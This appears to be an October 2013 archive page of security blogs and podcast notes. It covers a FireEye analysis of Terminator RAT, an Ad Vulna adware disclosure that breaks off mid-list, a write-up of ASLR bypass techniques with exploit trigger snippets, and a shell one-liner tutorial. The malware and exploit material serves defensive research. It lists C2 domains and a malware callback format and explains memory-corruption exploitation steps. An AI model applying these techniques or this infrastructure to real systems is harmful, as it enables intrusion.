Monthly Archives: October 2013

SCADA: Attack & Defense: Securing Critical Infrastructure – Episode 350, Part 2 – October 25, 2013

SCADA systems are being attacked and making headlines. However, this is not news, or is it? There is a lot of new found "buzz" around attacking SCADA and defending SCADA. Technology has evolved and many systems are Internet connected and more advanced than ever. Water, power, electric, manufacturing all have SCADA.

Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing.

Joel Langill is the SCADAhacker. His expertise was developed over nearly 30 years through in-depth, comprehensive industrial control systems architecture, product development, implementation, upgrade and remediation in a variety of roles covering manufacturing of consumer products, oil and gas including petroleum refining, automation solution sales and development, and system engineering.

Dale Peterson is the founder and CEO of Digital Bond, a control system consulting and research practice. He performed his first SCADA assessment in 2000, and Dale is the program chair for the S4 conference every January in Miami Beach.

Patrick Miller provides services as an independent security and regulatory advisor for the Critical Infrastructure sectors as Partner and Managing Principal of the Anfield Group.

Support Wounded Warriors, Active Defense: Taking The Fight To Attackers: Should We? – Episode 350, Part 1 – October 25, 2013

Welcome to our very special episode 350! We have a very special episode, all in support of wounded veterans in our armed services. Please take the time to donate using the links above. We've got an epic day in store for you, including contests, panel discussions, technical segments and more!

Active Defense: Taking The Fight To Attackers: Should We?

We've all heard the term "Hacking Back". We all have mixed feelings about this term. Lets be clear, its not about feelings! The revenge-based "hacking back" was doomed for failure from the beginning. On the flip side, we're losing the battle against attackers on many fronts. What can we do? Setting traps, tracking attackers, luring them into areas of the network and systems deemed "honeypots" is on the table, or is it? What are the legal ramifications to this activity?

Benjamin Wright is the author of several technology law books, including Business Law and Computer Security, published by the SANS Institute. With over 25 years in private law practice, he has advised many organizations, large and small, private sector and public sector, on privacy, computer security, e-mail discovery, outsourcing contracts and records management. Nothing Mr. Wright says in public is legal advice for your particular situation. If you need legal advice or a legal opinion, you should retain a lawyer.

Joshua Corman is the Director of Security Intelligence for Akamai. Mr. Corman’s cross-domain research highlights adversaries, game theory and motivational structures. His analysis cuts across sectors to the core security challenges plaguing the IT industry, and helps to drive evolutionary strategies toward emerging technologies and shifting incentives.

Dave Dittrich is an Affiliated Research Scientist with the Office of the Chief Information Security Officer at the University of Washington. He is also a member of the Honeynet Project and Seattle's "Agora" computer security group.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WW-II codebreaker. His first IDS was written more than 10 years ago designed to catch Morris-worm copycats.

Evasive Tactics: Terminator RAT

FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

  • It evades sandbox by terminating and removing itself (DW20.exe) after installing. Malicious behavior will only appear after reboot.
  • It deters single-object based sandbox by segregation of roles between collaborating malwares. The RAT (svchost_.exe) will collaborate with its relay (sss.exe) to communicate with the command and control server.
  • It deters forensics investigation by changing the startup location.
  • It deters file-based scanning that implements a maximum file size filter, by expanding the size of svchost_.exe to 40MB.

The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety (of possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

These modifications appear to be an attempt to evade network defenses, perhaps in response to defender’s increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

[caption id="attachment_3596" align="alignnone" width="585"]Figure 1 Figure 1[/caption]

 

1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)

 

DW20.exe was found to be the installation executable file. It will first create its working folders located at “%UserProfile%\Microsoft” and “%AppData%\2019”. The former is used to store the configurations and executable files (svchost_.exe and sss.exe) and the latter is used to store the shortcut link files. This folder “2019” was then configured to be the new start up folder location by changing the registry “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup" with the location of its path (see Figure 2).

[caption id="attachment_3597" align="alignnone" width="575"]Figure 2 Figure 2[/caption]

The executable file “sss.exe” was found to be the decrypted form of the resource named 140 with type “ACCELORATOR” (likely misspelling of Accelerator - see Figure 3). This resource was decrypted using customized XTEA algorithm and appended with an encrypted configuration for the domains and ports.

[caption id="attachment_3598" align="alignnone" width="307"]Figure 3 Figure 3[/caption]

After installation, DW20.exe deletes and terminates itself. The malwares will only run after reboot. This is one effective way to evade sandbox automatic analysis, as malicious activity will only reveal after a reboot.

 

2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)

 

sss.exe is an interesting malware component. As a researcher would analyze it independently, it is not considered a malicious program. This component plays the role as a network relay between the malware and the proxy server, by listening over port 8000. To achieve this, it first tries to identify the list of proxy servers that are used within the system using “WinHttpGetIEProxyConfigForCurrentUser”, and the discovered proxy servers and related ports are stored in the same directory in a file named “PROXY” (see Figure 4).

[caption id="attachment_3599" align="alignnone" width="425"]Figure 4 Figure 4[/caption]

When there is a new incoming TCP connection over port 8000, it will attempt to create a local to proxy socket connection. With that, it will check connectivity with the CnC server. If the response is 200, it will then start to create a “relay link” between the malware and the CnC server (see Figure 5). The “relay link” was created using two threads, where one thread will transfer data from socket 1 to socket 2 (see Figure 6) and the other will do vice versa.

[caption id="attachment_3600" align="alignnone" width="654"]Figure 5 Figure 5[/caption]

 

[caption id="attachment_3601" align="alignnone" width="497"]Figure 6 Figure 6[/caption]

As depicted in Figure 7, the user agent is hard coded. It is a possible means to identify potentially malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE 6.0.1.3” is not a valid version token.

 

Figure 7
Figure 7

 

The configurations for the malicious domains and ports to use are located at the last 188 bytes of the executable file (see Figure 8). The first 16 bytes is the key (boxed in red) to decrypt the remaining content using modified XTEA algorithm (see Figure 9). The two malicious domains found were “liumingzhen.zapto.org” and “liumingzhen.myftp.org”

[caption id="attachment_3603" align="alignnone" width="645"]Figure 8 Figure 8[/caption]

[caption id="attachment_3604" align="alignnone" width="639"]Figure 9 Figure 9[/caption]

 

3.   Network Traffic

 

The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7) was not configured with fake HTML, Yahoo Messenger, or Windows Messenger traffic header as it had in past variants. However, the content is encrypted in exactly the same way as previous versions of Terminator RAT.

[caption id="attachment_3605" align="alignnone" width="648"]Figure 10 Figure 10[/caption]

The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

[caption id="attachment_3606" align="alignnone" width="683"]Figure 11 Figure 11[/caption]

This particular sample is configured to one of two command and control servers:

 

     

  • liumingzhen.zapto.org / 123.51.208.69
  • liumingzhen.myftp.org / 123.51.208.69

We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

[caption id="attachment_3607" align="alignnone" width="583"]Figure 12 Figure 12[/caption]

The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

  • catlovers.25u.com  / 123.51.208.142

The command and control servers for both samples resolved to IP addresses in the same class C network.

 

4.   Campaign Connections

 

In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

[caption id="attachment_3608" align="alignnone" width="455"]Figure 13 Figure 13[/caption]

The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158), however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server, liumingzhen.zapto.org, but the callback is quite different:

XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$

In a separate case where liumingzhen.zapto.org has been used as the command and control server, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.

 

Conclusion

 

Terminator RAT is an example of how malware are increasingly becoming more sophisticated and harder to detect. There is a need for continual research to understand various techniques, tactics, and procedures used by the adversaries. Detection of exploitation and identification of anomalous callbacks are becoming extremely critical in preventing the malware from installing into the system or phoning back to the command control servers.

 

Update: Ad Vulna Continues

This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

Since our last notification to Google and Ad Vulna (code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the ad library included in the app to the newest version which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often and older versions of android does not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest version of the apps.

From our current analysis, there are still many other apps using the vulnaggressive versions of the ad library Ad Vulna on Google Play, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

Heather Mahalik on Smartphone Forensics Course, Drunken Security News – Episode 348 – October 10, 2013

This segment was broken in two parts as the technical segment with Heather Mahalik happened in the middle of it. Heather is a senior digital forensics analyst at Basis Technology. As the on-site project manager, she uses her experience to manage the cell phone exploitation team and supports media and cell phone forensics efforts in the U.S. government. Heather is a certified SANS instructor and teaching the upcoming course Advanced Smartphone and Mobile Device Forensics.

Ok, on to the stories of the week with Paul, Larry, Allison and Jack. What'd you do this summer? Disney? Six Flags? Big Data Land? After much chatter in the Twittersphere (logged here by Space Rogue) last week, Jack brings up the "Popping Penguins" article from Forbes. The article talks about this super vulnerable program that is going to be the downfall of Linux. It's called bash. Would you believe you can use bash to start a listener on your machine and then send some commands over telnet to have someone else's machine connect back to you? Uh oh. Also, beware of another application, one that runs from the desktop that lets you connect to other computers and pull down files from a machine you don't own. Yeah, that one's called a browser. Sounds equally dangerous, no? Should we uninstall bash as a security measure?

Larry threw out there an article on 5 WiFi security myths to abandon. But Larry mentioned that some of these might not actually be very new. Things like don't hide SSID as some newer systems will see them anyway and digging deeper to find the SSID isn't that hard. Plus, if its owner took the steps to hide it, wouldn't that pique your interest that there may be something good running there? Sending out a weak signal may sound like a good idea as if someone can't reach it, they can't connect to it, right? But all that does is annoys its intended users and if someone really wants to get on the network, they'll simply use an antenna. The article ends with the non-myth that if you truly want WiFi security, make sure you use good encryption and a strong password. Simple, eh?

Jack was looking forward to going on a good patch rant. He and Paul have done webinars about really stretching things and getting your patch cycle down to five days from the day of release. Jack said during the good old days, he'd challenge himself to getting his systems patched within 72 hours. Patch Tuesday was to be completed by Friday. In this article by Dr. Anton Chuvakin, he does indicate how it would be good for some big corporations to get their patch cycle down from 90 days to 30 days, but then argues if the bad guys only need 3, then what's the point of all that effort? Jack's feeling is that even the 30 days should be enough in many cases, but it's often politics and other "can't do" attitudes that prevent it from happening. Why is that? Get those patches in place people!

One quick note on a tangent the team went off on. In their experience as pentesters, Larry and Paul mention that all to often the way they end up pwning a system is through some machine that no one knew was running, with services that no one knew were running, with an account that no one knows why it still exists. Do you have a good inventory of where your data is? What machines are in your data center? What services and accounts are on each? If those are gold to a pentester, who has to respect a customer's defined scope, guess what a malicious user is going to do to your network.

Paul's looking for advice on what new phone he should get? Android? iPhone? What say you? Tweet him up with your suggestion at @securityweekly.

Remember that Yahoo bug bounty program? $12.50 credit toward the Yahoo store? A little update from the rants and ridicule from last week, it was actually one guy , Ramses Martinez, Director, Yahoo Paranoids, who was very appreciative of people reporting bugs and was paying them out of pocket. He would send researchers a Yahoo tshirt but would then find out the recipient already had multiple Yahoo shirts. Martinez's idea then was to give the reporter a credit in the Yahoo store matching the value of the shirt, our of his own pocket. Since the uproar, Yahoo has installed its own bug bounty program and Martinez is no longer paying for the reports himself. Good on ya, Yahoo and even better, thank you Ramses Martinez for caring about security.

Speaking of bug bounties, Google has started a bug bounty program for open source software. Repeat that, it's not just Google software that they're paying bounties for, it's software that there really is no organization behind and normally count on volunteers to fix things. Now Google is putting their money behind that effort. As Allison mentions, there hasn't ever been any motivation for anyone to report bugs and now there is.

estrada-sm.jpgPaunch, the alleged author of the Blackhole exploit kit was arrested in Russia last week. Or at least we think so. Some unconfirmed reports have indicated this and Blackhole has not been updated since this time. Or maybe the guy just decided to take an extended vacation and threw the story out there himself. Either way, it might be time for Evil Bob to find a new exploit kit. (Note: Erik Estrada is not "Paunch", he's Ponch, as in Frank Poncharello)

Microsoft has a new disk cleanup where it removes all the old and outdated updates. Jack gained more than 6 GB of space after running the cleanup but a word of caution, it take a concerning long time for the next reboot. You might think you killed your computer but no, it really does take that long.

Check out "Tails" a security and privacy distribution and let us know what you think. Is it good? What makes it a better choice than some others? Though the number of security updates in recent versions is a little concerning. Yeah, I get it that it's good that security holes are fixed and that it's to software that the distro is including. But it's just a little concerning when you pitch it as being for security and privacy yet there are piles of security updates. It makes me wonder just how secure it is and whether it's any better than a secure version of your favorite distribution anyway. But you can certainly let me know and I'll post some comments from you in upcoming week. Tweet me at @plaverty9

There was also some discussion on iOS7 image identification, Larry has a colleague at Inguardians who wrote up an intro to using rfcat and Jack suggests taking a deeper look for yourself before jumping into the patch for MS13-81 and whether your system needs it. If it does, test thoroughly. It's got some deep stuff on it.

Interview with Thierry Zoller – Episode 348 – October 10, 2013

Thierry has 14 years experience in information security, designing resistant architectures and systems, managing development and information security teams, ISM policies and high profile penetration tests. Thierry has a security blog over at blog.zoller.lu . Thierry is currently now working as a Practice Lead for Threat and Vulnerability Management at Verizon Business.

Our Local Security Meet [19th October 2013] – Bangalore

Talks: 09:30 – 10:00:  WebSockets for Beginners – Prasanna K WebSockets is definitely one of the brighter features of HTML5. It allows for easy and efficient real-time communication with the server,. It’s very useful when you’re developing an interactive application like chat, game, real time reporting system etc. From a security standpoint there are many […]

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique was first described in here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792.

Limitations

The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

Modify the BSTR length/null terminator

This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.

CVE-2013-0640

The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:

7

Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up from the immunityinc’s blog.

Limitations

This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

Here is the list of known zero-day exploits using this technique:

CVE-2013-0634

This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a continuous memory layout by allocating the following objects":13
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.

CVE-2013-3163

This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:.12
  2. After the spray, those objects are stored aligned in a stable memory address. For example:1

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code.

  3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0.14
  5. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows:9

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode.

CVE-2013-1690

The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:

4

In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following:

6

In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.

10

After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.

CVE-2013-1493

This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.

Summary

The following table outlines recent APT zero-day exploits and what bypass techniques they used:

image

Conclusion

ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Episode #171: Flexibly Finding Firewall Phrases

Old Tim answers an old email

Patrick Hoerter writes in:
I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only the configuration items that are in some way tied to a specific port, in this case "port10".

Sample Data:

edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "192.168.0.0"
set subnet 192.168.0.0 255.255.0.0
next
edit "10.0.0.0"
set subnet 10.0.0.0 255.0.0.0
next
edit "172.16.0.0"
set subnet 172.16.0.0 255.240.0.0
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
set subnet 10.254.154.0 255.255.255.0
next
edit "vpn-CandC-3"
set associated-interface "port10"
set subnet 10.254.155.0 255.255.255.0
next
edit 92
set srcintf "port10"
set dstintf "port1"
set srcaddr "vpn-CandC-1" "vpn-CandC-2" "vpn-CandC-3"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic enable
next

Sample Results:

edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
set subnet 10.254.154.0 255.255.255.0
next
edit "vpn-CandC-3"
set associated-interface "port10"
set subnet 10.254.155.0 255.255.255.0
next
edit 92
set srcintf "port10"
set dstintf "port1"
set srcaddr "vpn-CandC-1" "vpn-CandC-2" "vpn-CandC-3"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic enable
next

Patrick gave us the full text and the expected output. In short, he wants the text between "edit" and "next" if it contains the text "port10". To begin this task we need to first need get each of the edit/next chunks.

PS C:\> ((cat fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches

This command will read the entire file fw.txt and combine it into one string. Normally, each line is treated as a separate object, but we are going to join them into a big string using the newline (`n) to join each line. Now that the text is one big string we can use Select-String with a regular expression to find all the matches. The regular expression will find text across line breaks and allows for very flexible searches so we can find our edit/next chunks. Here is a break down of the pieces of the regular expression:

  • (?s) - Use single line mode where the dot (.) will match any character, including a newline character. This allows us to match text across multiple lines.
  • edit - the literal text "edit"
  • .*? - find any text, but be lazy, not greedy. This means it should match the smallest chunks that will match the criteria.
  • next - literal text next

Now that we have the chunks we use a Where-Object filter (alias ?) to find matching objects to pass down the pipeline.

PS C:\> ((cat .\fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches | ? { $_.Captures | Select-String "port10" }

Inside the Where-Object filter we can check the Value property to see if it contains the text "port10". The Value property is piped into Select-String to look for the text "port10", and if it contains "port10" it continues down the pipeline, if not, it is dropped.

At this point, we have the objects we want, so all we need to do is display the results by expanding the Value and displaying it again. The expansion means that it just displays the text and no data or metadata associated with the parent object. Here is what the final command looks like.

PS C:\> ((cat .\fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches | ? { $_.Value | Select-String "port10" } |
select -ExpandProperty Value

Not so bad, but I have a feeling it is going to be worse for my friend Hal.

Old Hal uses some old tricks

Oh sure, I know what Tim's thinking here. "It's multi-line matching, and the Unix shell is lousy at that. Hal's in trouble now. Mwhahaha. The Command-Line Kung Fu title will finally be mine! Mine! Do you hear me?!? MINE!"

Uh-huh. Well how about this, old friend:

awk -v RS=next -v ORS=next '/port10/' fw.txt

While we're doing multi-line matching here, the blocks of text have nice regular delimiters. That means I can change the awk "record separator" ("RS") from newline to the string "next" and gobble up entire chunks at a time.

After that, it's smooth sailing. I just use awk's pattern-matching operator to match the "port10" strings. Since I don't have an action defined, "{print}" is assumed and we output the matching blocks of text.

The only tricky part is that I have to remember to change the "output record separator" ("ORS") to be "next". Otherwise, awk will use its default ORS value, which is newline. That would give me output like:


$ awk -v RS=next '/port10/' fw.txt
edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable


edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0


edit "vpn-CandC-2"
set associated-interface "port10"
...

The "next" terminators get left out and we get extra lines in the output. But when ORS is set properly, we get exactly what we were after:


$ awk -v RS=next -v ORS=next '/port10/' fw.txt
edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
...

So that wasn't bad at all. Sorry about that Tim. Maybe next time, old buddy.

Jamie Filson on gitDigger, Jared DeMott on C/C++ Auditing – Episode 347 – October 3, 2013

Jaime "WiK" Filson enjoys long walks on the beach while his computer equipment is busy fuzzing software, cracking passwords, or spidering the internet. He's also the creator of the gitDigger project as well as staff of DEFCON's wireless village.

Jared DeMott has spoken at security conferences such as Black Hat, Defcon, ToorCon, Shakacon, DakotaCon, GRRCon, and DerbyCon. He is active in the security community by teaching his Application Security course, and has co-authored a book on Fuzzing.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggresive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing it.

Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive—if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities when exploited allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without user’s knowledge, stealing two-­factor authentication tokens sent via SMS, or turning the device into part of a botnet.

We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

  • Aggressive Behaviors

    • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

    • Vulna will download arbitrary code and execute it when instructed by the remote server.

  • Vulnerabilities

